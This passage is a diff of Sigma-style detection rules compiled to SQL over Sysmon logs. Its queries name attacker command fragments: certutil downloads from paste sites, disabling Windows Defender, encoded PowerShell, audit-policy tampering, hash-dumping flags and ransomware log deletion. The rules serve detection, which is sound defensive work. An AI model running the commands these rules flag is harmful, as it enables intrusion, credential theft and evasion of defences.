folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": 
"Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' 
--dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - 
"attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + 
"description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 
'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 
'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", 
"status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. 
Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 